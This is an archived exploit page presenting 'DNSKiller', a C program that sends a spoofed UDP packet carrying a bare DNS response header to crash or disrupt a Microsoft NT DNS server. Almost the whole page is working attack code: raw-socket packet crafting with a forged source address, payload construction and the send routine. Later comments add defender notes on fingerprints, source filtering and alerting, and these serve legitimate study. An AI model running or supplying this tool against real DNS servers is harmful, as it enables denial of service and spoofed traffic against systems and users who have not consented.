
nt-dns.c

nt-dns.c
Posted Mar 13, 2000
Authored by Rikhardur Egilsson | Site hack.co.za

DNSKiller - Demonstrates a bug in Microsoft DNS server.

tags | denial of service
SHA-256 | 9548ccfae869d74f2c33e0f6c9837afdf43d4c5dbdca426b2320812f86650285

nt-dns.c

/****************************************************************************
** DNSKiller
** Demonstrates a bug in Microsoft DNS server.
** Version 0.9-970210 - I don't know if this works.
** (c) 1997 - Rikhardur Egilsson - rikardur@skyrr.is
*****************************************************************************/

#include <string.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

/*
 * Print the command-line synopsis to stdout and terminate the process.
 *
 * str: program name to show in the synopsis (callers pass argv[0]).
 * Never returns; the process exits with status -1.
 */
void Usage(char *str) {
    static const char *const option_help[] = {
        " <source_host> is an optional spoofed 'from' address.\n",
        " <dest_host> is the NT DNS server.\n",
    };
    size_t i;

    printf("Usage: %s [-s <source_host>] -d <dest_host>\n", str);
    for (i = 0; i < sizeof option_help / sizeof option_help[0]; i++)
        fputs(option_help[i], stdout);

    exit(-1);
}


/****************************************************************************
** Use: host = GetHost(name)
** For: 'name' is 0, or points to an ASCIIZ string.
** After: 'host' is the IP address of 'name', in network byte order, if found,
** or 0 if not found.
** If 'name' was 0, 'host' represents this host.
*****************************************************************************/
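/*
 * Resolve 'name' to an IPv4 address.
 *
 * name: host name or dotted-quad string; 0 (NULL) means "this host", whose
 *       name is obtained with gethostname().
 * Returns the host's first address as a 32-bit value in network byte order,
 * widened to unsigned long, or 0 when the lookup fails (a message is printed
 * to stdout in that case).
 */
unsigned long int GetHost(char *name) {
    char buf[100];
    struct hostent *Host;
    struct in_addr addr;

    if (!name) {
        /* gethostname() can fail, and on truncation it need not
         * NUL-terminate the buffer, so check it and terminate explicitly. */
        if (gethostname(buf, sizeof buf) != 0) {
            printf("Unknown host: %s\n", "<NULL>");
            return 0;
        }
        buf[sizeof buf - 1] = '\0';
        printf("Using this host as source..\n");
        name = buf;
    }

    /* gethostbyname() also accepts dotted-quad text. The original fell back
     * to gethostbyaddr(name, strlen(name), AF_INET), which hands text to a
     * call that expects a binary address, so that fallback is dropped. */
    Host = gethostbyname(name);
    if (!Host || Host->h_addrtype != AF_INET ||
        Host->h_length != (int)sizeof addr || !Host->h_addr_list[0]) {
        printf("Unknown host: %s\n", name);
        return 0;
    }

    /* Copy into a 4-byte in_addr first: copying 4 bytes straight into an
     * unsigned long left its upper bytes uninitialized where long is wider
     * than 32 bits. */
    memcpy(&addr, Host->h_addr_list[0], sizeof addr);
    return addr.s_addr;
}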


/*************************************************************************
** Usage: i=SendUDP(from, to, data, len, socket)
** For: 'data' points to the first byte of a UDP datagram of 'len' bytes.
** 'from' and 'to' represent IP addresses in network byte order.
** 'socket' must be a previously opened RAW_SOCKET.
** After: if i=1, 'data' was sent via 'socket' as a UDP packet to 'to',
** spoofed as originating from 'from'.
** if i!=1, an error occurred and no data was sent.
*************************************************************************/
int SendUDP(unsigned long int from, unsigned long int to, char *data,
int len, int sock) {
/*
 * Prepend a hand-built IPv4 header to the 'len' bytes at 'data' and hand the
 * result to sendto() on 'sock'.
 *
 * from, to: IPv4 addresses written verbatim into the header's saddr/daddr.
 *           The source address is whatever the caller supplies, which is how
 *           the "spoofed 'from' address" in the usage text is achieved.
 * data:     must start with a struct udphdr; its 'dest' field is read below.
 * len:      byte count of 'data'.
 * sock:     socket descriptor passed to sendto().
 *
 * Returns the value of sendto(): the number of bytes sent on success, -1 on
 * error. NOTE(review): the header comment above this function speaks of
 * "i=1"; the code returns the sendto() result unchanged.
 *
 * Defender note: a forged source address only leaves the sending network when
 * that network does not filter on source address (BCP 38 style ingress/egress
 * filtering).
 */

/* NOTE(review): 'len' is not validated; a negative or very large value gives
 * this variable-length array an invalid size. */
char buf[len+sizeof(struct iphdr)];
struct in_addr host;
struct iphdr *ip=(struct iphdr *)buf;
/* NOTE(review): 'sin' is never zeroed, so members other than the three
 * assigned below hold indeterminate bytes. */
struct sockaddr_in sin;

sin.sin_family=AF_INET;
sin.sin_addr.s_addr=to;
/* Destination port is taken from the UDP header at the start of 'data'. */
sin.sin_port=((struct udphdr *)data)->dest;

bzero((void *)buf, sizeof(struct iphdr)+len);
ip->version=4;
/* Header length of five 32-bit words, i.e. an IPv4 header without options. */
ip->ihl=5;
ip->tos=0;
ip->tot_len=htons(sizeof(struct iphdr)+len);
/* Every packet carries the same IP ID (0xdead) and TTL (255); constants like
 * these are usable as a fingerprint for this tool in packet captures. */
ip->id=htons(0xdead);
ip->frag_off=0;
ip->ttl=255;
ip->protocol=IPPROTO_UDP;
ip->saddr=from;
ip->daddr=to;
/* Note: Checksum will be calculated by the kernel. */

/* The caller's UDP datagram follows the IP header unchanged. */
memcpy(buf+sizeof(struct iphdr), data, len);

/* The two addresses are printed in separate printf() calls; inet_ntoa()
 * returns a pointer to a static buffer that the next call overwrites. */
host.s_addr=(unsigned long int)from;
printf("Sending from: %s -> ", inet_ntoa(host));
host.s_addr=(unsigned long int)to;
printf("to: %s ", inet_ntoa(host));
printf(" %d bytes.\n", len);

return(sendto(sock, buf,len+sizeof(struct iphdr), 0,
(struct sockaddr *)&sin, sizeof(sin)));

}


void CreatePayload(char **Payload, int *len) {
/*
 * Build the UDP datagram this program sends: a UDP header followed by a bare
 * DNS header (HEADER from <arpa/nameser.h>) with no question or answer data.
 *
 * Payload: receives a pointer to the datagram. It points into a static
 *          buffer, so it stays valid after return, but every call reuses and
 *          overwrites the same storage.
 * len:     receives the datagram size, sizeof(struct udphdr)+sizeof(HEADER).
 *
 * Defender note: what reaches the wire is a DNS message flagged as a response
 * (qr=1), with every other DNS header field zero, sent to port 53 from source
 * port 1111. A message with the response flag set that arrives at a server
 * and matches no query the server issued is a reasonable thing to alert on.
 * The page describes this as demonstrating a bug in Microsoft DNS server; the
 * code shows only what is sent, not how the server handles it.
 */

static char buf[sizeof(struct udphdr)+sizeof(HEADER)];
struct udphdr *udp=(struct udphdr *)buf;
HEADER *dns=(HEADER *) (buf+sizeof(struct udphdr));

/* Zero both headers first; only the fields set below are non-zero. */
bzero((void *)buf, sizeof(HEADER)+sizeof(struct udphdr));
/* Fixed source port on every run. */
udp->source=htons(1111);
udp->dest=htons(53); /* domain */
udp->len=htons(sizeof(struct udphdr)+sizeof(HEADER));
/* UDP checksum field left at zero. */
udp->check=0;
dns->qr=1; /* This is an answer */

*len=sizeof(struct udphdr)+sizeof(HEADER);
*Payload=buf;
}


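/*
 * Entry point: open a raw socket, drop privilege, parse the -s/-d/-h options,
 * resolve both hosts, build the payload and send it once.
 *
 * Returns 0 after a successful send; every failure path exits with status -1.
 *
 * Defender note: the socket is opened before setuid(getuid()), which suggests
 * the program was meant to be installed set-user-ID root. Installed that way,
 * any local user can emit packets with a forged source address, so such a
 * binary should not be left set-user-ID on a shared host.
 */
int main(int argc, char *argv[]) {
    extern char *optarg;
    extern int optind, opterr, optopt;
    char *source = 0, *dest = 0, *package;
    int c, sock, len;   /* getopt() returns int; storing it in a char breaks
                         * the -1 comparison where char is unsigned */
    unsigned long int from, to;

    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
        printf("No raw socket. Who are you ?\n");
        exit(-1);
    }

    /* Give up any set-user-ID privilege now that the socket exists. The
     * result must be checked: continuing after a failed setuid() would run
     * the rest of the program with the elevated identity. */
    if (setuid(getuid()) != 0) {
        perror("setuid");
        close(sock);
        exit(-1);
    }

    while ((c = getopt(argc, argv, "hs:d:")) != -1) {
        switch (c) {
        case 's':
            source = optarg;
            break;
        case 'd':
            dest = optarg;
            break;
        case 'h':
        default:
            /* Usage() does not return. */
            Usage(argv[0]);
            break;
        }
    }

    if (!dest) {
        printf("Huhm, ehrm, didn't we forget something ?\n");
        Usage(argv[0]);
    }

    /* A null 'source' makes GetHost() resolve this host's own name. */
    from = GetHost(source);
    to = GetHost(dest);
    if (!from || !to) {
        printf("Error, can't locate ");
        printf("%s host address.\n", (from) ? "target" : "source");
        close(sock);
        exit(-1);
    }

    CreatePayload(&package, &len);

    /* SendUDP() returns the sendto() result; report a failed send instead of
     * silently exiting with success. */
    if (SendUDP(from, to, package, len, sock) < 0) {
        perror("sendto");
        close(sock);
        exit(-1);
    }

    close(sock);
    return 0;
}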
/* www.hack.co.za */